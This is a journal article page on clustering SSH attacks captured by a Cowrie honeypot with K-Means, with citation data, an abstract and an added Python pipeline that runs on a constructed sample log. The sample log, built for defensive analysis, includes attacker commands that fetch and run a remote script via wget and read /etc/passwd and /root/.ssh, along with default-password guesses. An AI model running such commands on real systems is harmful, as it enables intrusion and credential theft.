Research Article

Discovering SSH Attack Patterns Using Cowrie Honeypot and K-Means Clustering

by Samadram Govind Singh
International Journal of Computer Applications
Foundation of Computer Science (FCS), NY, USA
Volume 187 - Issue 74
Published: January 2026
Authors: Samadram Govind Singh
10.5120/ijca2026926253

Samadram Govind Singh . Discovering SSH Attack Patterns Using Cowrie Honeypot and K-Means Clustering. International Journal of Computer Applications. 187, 74 (January 2026), 32-39. DOI=10.5120/ijca2026926253

                        @article{ 10.5120/ijca2026926253,
                        author  = { Samadram Govind Singh },
                        title   = { Discovering SSH Attack Patterns Using Cowrie Honeypot and K-Means Clustering },
                        journal = { International Journal of Computer Applications },
                        year    = { 2026 },
                        volume  = { 187 },
                        number  = { 74 },
                        pages   = { 32-39 },
                        doi     = { 10.5120/ijca2026926253 },
                        publisher = { Foundation of Computer Science (FCS), NY, USA }
                        }
                        %0 Journal Article
                        %D 2026
                        %A Samadram Govind Singh
                        %T Discovering SSH Attack Patterns Using Cowrie Honeypot and K-Means Clustering
                        %J International Journal of Computer Applications
                        %V 187
                        %N 74
                        %P 32-39
                        %R 10.5120/ijca2026926253
                        %I Foundation of Computer Science (FCS), NY, USA
Abstract

This paper studies the combination of honeypots with machine learning for threat detection: capturing attacker activity, finding patterns and anomalies in it, and learning from them. In this study the Cowrie honeypot was deployed on an Ubuntu server in its own Python environment. That environment is fully isolated from the real server environment, and Cowrie mimics a real system, luring attackers into the trap. Cowrie emulates the SSH service, and every command, source IP address and timestamp is captured in a log file stored at a path defined by the administrator. The log file is then converted to CSV so that the collected data can be fed to the clustering algorithm in Altair RapidMiner. In RapidMiner, the CSV file is read and passed to a Select Attributes operator, which keeps only the attributes of interest. Cowrie logs contain a good deal of noise, and the attributes are on very different scales, so the data is normalized before clustering. Because normalization is done with a z-transformation, which accepts only numerical values, a Nominal to Numerical operator is added before the Normalize operator. The normalized data is then passed to a Clustering operator running the K-Means algorithm; three clusters are studied in this research. The clustering revealed distinct patterns in SSH attack behaviour against the honeypot, turning raw log data into actionable intelligence for proactive defence. In summary, integrating honeypot deception with machine learning is a significant advance for cybersecurity: the combination enhances threat detection and analysis and paves the way for robust, adaptive, self-evolving security systems able to counter changing cyber threats.
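The pipeline the abstract describes (Cowrie JSON log, per-session CSV, attribute selection, nominal-to-numerical conversion, z-transformation, K-Means with k = 3), carried out in plain Python rather than RapidMiner, as an added example. This is not code from the paper: the log lines are constructed samples in Cowrie's JSON-lines format, not captured traffic, and the per-session attributes (failed and successful logins, command count, first username tried) and the farthest-first seeding of K-Means are choices made here, not the author's.

```python
"""Cowrie JSON log -> per-session CSV -> nominal-to-numerical -> z-transformation -> k-means (k=3).
Added example, standard library only; the log lines below are constructed in Cowrie's JSON-lines
format (field names follow Cowrie, the IPs, session ids and timestamps are invented)."""
import csv
import io
import json
import math
from collections import defaultdict

SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","session":"b1","timestamp":"2025-01-05T02:10:01Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"198.51.100.7","session":"b1","timestamp":"2025-01-05T02:10:02Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"password","src_ip":"198.51.100.7","session":"b1","timestamp":"2025-01-05T02:10:03Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"toor","src_ip":"198.51.100.7","session":"b1","timestamp":"2025-01-05T02:10:04Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"qwerty","src_ip":"198.51.100.7","session":"b1","timestamp":"2025-01-05T02:10:05Z"}
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.44","session":"b2","timestamp":"2025-01-05T03:00:10Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"203.0.113.44","session":"b2","timestamp":"2025-01-05T03:00:11Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","src_ip":"203.0.113.44","session":"b2","timestamp":"2025-01-05T03:00:12Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","src_ip":"203.0.113.44","session":"b2","timestamp":"2025-01-05T03:00:13Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","src_ip":"203.0.113.44","session":"b2","timestamp":"2025-01-05T03:00:14Z"}
{"eventid":"cowrie.session.connect","src_ip":"192.0.2.19","session":"c1","timestamp":"2025-01-05T04:20:00Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","src_ip":"192.0.2.19","session":"c1","timestamp":"2025-01-05T04:20:01Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123456","src_ip":"192.0.2.19","session":"c1","timestamp":"2025-01-05T04:20:02Z"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"192.0.2.19","session":"c1","timestamp":"2025-01-05T04:20:03Z"}
{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://example.invalid/x.sh; sh x.sh","src_ip":"192.0.2.19","session":"c1","timestamp":"2025-01-05T04:20:04Z"}
{"eventid":"cowrie.session.connect","src_ip":"192.0.2.77","session":"c2","timestamp":"2025-01-05T05:45:00Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","src_ip":"192.0.2.77","session":"c2","timestamp":"2025-01-05T05:45:01Z"}
{"eventid":"cowrie.login.success","username":"root","password":"password","src_ip":"192.0.2.77","session":"c2","timestamp":"2025-01-05T05:45:02Z"}
{"eventid":"cowrie.command.input","input":"cat /etc/passwd","src_ip":"192.0.2.77","session":"c2","timestamp":"2025-01-05T05:45:03Z"}
{"eventid":"cowrie.command.input","input":"ls -la /root/.ssh","src_ip":"192.0.2.77","session":"c2","timestamp":"2025-01-05T05:45:04Z"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.200","session":"s1","timestamp":"2025-01-05T06:00:00Z"}
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.9","session":"s2","timestamp":"2025-01-05T06:30:00Z"}
"""

COUNTED = {"cowrie.login.failed": "failed", "cowrie.login.success": "success",
           "cowrie.command.input": "commands"}

def parse_sessions(log_text):
    """Select attributes: one row per SSH session (login counts, command count, first username tried)."""
    rows = defaultdict(lambda: {"src_ip": "", "username": "none", "failed": 0, "success": 0, "commands": 0})
    for line in filter(str.strip, log_text.splitlines()):
        ev = json.loads(line)
        row = rows[ev["session"]]
        row["src_ip"] = ev.get("src_ip", row["src_ip"])
        if ev["eventid"] in COUNTED:
            row[COUNTED[ev["eventid"]]] += 1
        if ev["eventid"].startswith("cowrie.login.") and row["username"] == "none":
            row["username"] = ev.get("username", "none")
    return dict(rows)

def sessions_to_csv(rows):
    """The log-to-CSV step: one line per session, the shape a clustering tool ingests."""
    out = io.StringIO()
    writer = csv.DictWriter(out, fieldnames=["session", "src_ip", "username", "failed", "success", "commands"])
    writer.writeheader()
    writer.writerows({"session": s, **rows[s]} for s in sorted(rows))
    return out.getvalue()

def build_matrix(rows):
    """Nominal-to-numerical: dummy-code 'username' (one 0/1 column per value); session and src_ip are identifiers, not behaviour, and stay out."""
    sids, usernames = sorted(rows), sorted({r["username"] for r in rows.values()})
    names = ["failed", "success", "commands"] + [f"username={u}" for u in usernames]
    matrix = [[float(rows[s][n]) for n in names[:3]] + [float(rows[s]["username"] == u) for u in usernames]
              for s in sids]
    return sids, names, matrix

def z_transform(matrix):
    """Column-wise (x - mean) / std. A constant column has std 0 and is mapped to 0 instead of dividing by it."""
    cols = list(zip(*matrix))
    means = [sum(c) / len(c) for c in cols]
    stds = [math.sqrt(sum((x - m) ** 2 for x in c) / len(c)) for c, m in zip(cols, means)]
    return [[(x - m) / s if s else 0.0 for x, m, s in zip(row, means, stds)] for row in matrix]

def kmeans(points, k, max_iter=100):
    """Lloyd's k-means with deterministic farthest-first seeding, so repeated runs give the same clusters."""
    def d2(a, b):
        return sum((x - y) ** 2 for x, y in zip(a, b))
    centroids = [points[0]]
    while len(centroids) < k:  # next seed: the point farthest from every seed chosen so far
        centroids.append(max(points, key=lambda p: min(d2(p, c) for c in centroids)))
    labels = None
    for _ in range(max_iter):
        new = [min(range(k), key=lambda j: d2(p, centroids[j])) for p in points]
        if new == labels:  # assignments stable: converged
            break
        labels = new
        for j in range(k):
            members = [p for p, lab in zip(points, labels) if lab == j]
            if members:  # an emptied cluster keeps its previous centroid
                centroids[j] = [sum(col) / len(members) for col in zip(*members)]
    return labels

def cluster_sessions(log_text, k=3):
    """Whole pipeline; returns {session_id: cluster label}."""
    sids, _, matrix = build_matrix(parse_sessions(log_text))
    return dict(zip(sids, kmeans(z_transform(matrix), k)))

if __name__ == "__main__":
    print(sessions_to_csv(parse_sessions(SAMPLE_LOG)), cluster_sessions(SAMPLE_LOG))
```

On the constructed log this separates the two brute-force sessions (many failed logins, no commands), the two sessions that logged in and ran commands, and the two connect-only scanners into three clusters. Two points a practitioner should carry over to real data: the z-transformation is what keeps the login counts (in the tens or hundreds) from swamping the 0/1 dummy columns, and session ids and source IPs are deliberately kept out of the feature matrix, since dummy-coding an identifier gives every session its own column and k-means then clusters on identity rather than behaviour. The value k = 3 is taken from the abstract; on a real Cowrie log it should be justified (for example by an elbow or silhouette check) rather than assumed.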

Index Terms
Computer Science
Information Sciences
Keywords

Honeypots, Cowrie, Ubuntu, Machine Learning, SSH
